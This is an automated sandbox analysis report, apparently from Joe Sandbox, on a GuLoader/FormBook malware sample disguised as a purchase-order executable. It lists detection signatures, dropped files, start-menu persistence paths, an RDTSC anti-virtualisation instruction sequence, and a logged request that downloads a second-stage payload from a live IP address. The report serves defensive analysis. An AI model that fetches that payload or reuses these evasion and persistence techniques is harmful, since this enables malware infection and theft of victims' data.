Windows Analysis Report
Purchase Order Purchase Order Purchase Order Purchase Order.exe

Overview

General Information

Sample name: Purchase Order Purchase Order Purchase Order Purchase Order.exe
Analysis ID: 1557894
MD5: b9a03fb0c2c7f23a1e4ccb0d79c5053c
SHA1: 4d87c4ed89d8b92f2b6849dc6af6a8850f8e5e7c
SHA256: 099369eb025c3e23b6669c872ac2572e7bc4ba9200eb4d6318284983ddb78e3f
Tags: exe, GuLoader, user-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
      No Sigma rule has matched
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-11-18T18:11:16.708256+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 185.222.57.90 | 80 | TCP

      AV Detection

      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, ReversingLabs: Detection: 27%
      Source: Yara match, File source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_004059CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_004065FD FindFirstFileW,FindClose,0_2_004065FD
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, File opened: C:\Users\user
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, File opened: C:\Users\user\AppData
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, File opened: C:\Users\user\AppData\Roaming
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49711 -> 185.222.57.90:80
      Source: global traffic, HTTP traffic detected: GET /zFSrvbrRquo53.bin HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0, Host: 185.222.57.90, Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.90
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047F6000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450798080.0000000004910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.bin
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.90/zFSrvbrRquo53.binlb
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405461

      E-Banking Fraud

      Source: Yara match, File source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: initial sample, Static PE information: Filename: Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, Process Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348535C0 NtCreateMutant,LdrInitializeThunk,5_2_348535C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_34852C70
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_34852DF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852B60 NtClose,LdrInitializeThunk,5_2_34852B60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34854650 NtSuspendThread,5_2_34854650
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34853090 NtSetValueKey,5_2_34853090
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34853010 NtOpenDirectoryObject,5_2_34853010
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34854340 NtSetContextThread,5_2_34854340
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852CA0 NtQueryInformationToken,5_2_34852CA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852CC0 NtQueryVirtualMemory,5_2_34852CC0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852CF0 NtOpenProcess,5_2_34852CF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852C00 NtQueryInformationProcess,5_2_34852C00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852C60 NtCreateKey,5_2_34852C60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852DB0 NtEnumerateKey,5_2_34852DB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852DD0 NtDelayExecution,5_2_34852DD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852D00 NtSetInformationFile,5_2_34852D00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852D10 NtMapViewOfSection,5_2_34852D10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34853D10 NtOpenProcessToken,5_2_34853D10
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852D30 NtUnmapViewOfSection,5_2_34852D30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34853D70 NtOpenThread,5_2_34853D70
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852E80 NtReadVirtualMemory,5_2_34852E80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852EA0 NtAdjustPrivilegesToken,5_2_34852EA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852EE0 NtQueueApcThread,5_2_34852EE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852E30 NtWriteVirtualMemory,5_2_34852E30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852F90 NtProtectVirtualMemory,5_2_34852F90
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852FA0 NtQuerySection,5_2_34852FA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852FB0 NtResumeThread,5_2_34852FB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852FE0 NtCreateFile,5_2_34852FE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852F30 NtCreateSection,5_2_34852F30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852F60 NtCreateProcessEx,5_2_34852F60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348539B0 NtGetContextThread,5_2_348539B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852AB0 NtWaitForSingleObject,5_2_34852AB0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852AD0 NtReadFile,5_2_34852AD0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852AF0 NtWriteFile,5_2_34852AF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852B80 NtQueryInformationFile,5_2_34852B80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852BA0 NtEnumerateValueKey,5_2_34852BA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852BE0 NtQueryValueKey,5_2_34852BE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852BF0 NtAllocateVirtualMemory,5_2_34852BF0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040338F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe, File created: C:\Windows\Fonts\Gullis.lnk
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DAB405_2_348DAB40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348DFB765_2_348DFB76
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: String function: 3480B970 appears 241 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: String function: 34855130 appears 55 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: String function: 3488EA12 appears 70 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: String function: 3489F290 appears 100 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: String function: 34867E54 appears 93 times
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.00000000345B2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034760000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine; Classification label: mal80.troj.evad.winEXE@3/8@0/1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_00404722 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Local\Temp\nsr584D.tmp
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe; ReversingLabs: Detection: 27%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File read: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: unknown; Process created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Process created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Section loaded (in order of first load, repeated entries omitted): uxtheme.dll, userenv.dll, apphelp.dll, propsys.dll, dwmapi.dll, cryptbase.dll, oleacc.dll, version.dll, shfolder.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, profapi.dll, iertutil.dll, sspicli.dll, powrprof.dll, winhttp.dll, wkscli.dll, netutils.dll, umpdc.dll, wininet.dll, ondemandconnroutehelper.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Gullis.lnk.0.dr; LNK file: ..\..\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\lensaftalerne.sla
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2409235089.0000000034633000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407137260.000000003448F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      Source: Yara match; File source: 00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_70121B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_70122FD0 push eax; ret (0_2_70122FFE)
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 5_2_348109AD push ecx; mov dword ptr [esp], ecx (5_2_348109B6)
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: \purchase order purchase order purchase order purchase order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Vedbendens
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Vedbendens\Hoveddelenes.haa
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Clap
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Clap\Exoascaceous73.tra
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Atomizing.Eft
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Underemphasizing70.tio
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\sulkens.dic
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes\vec.jpg
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; API/Special instruction interceptor: Address: 476F6B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; API/Special instruction interceptor: Address: 334F6B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; RDTSC instruction interceptor: First address: 4733B9E second address: 4733B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F039C8178A6h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; RDTSC instruction interceptor: First address: 3313B9E second address: 3313B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F039D1785B6h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 5_2_348E21AE rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; API coverage: 0.3 %
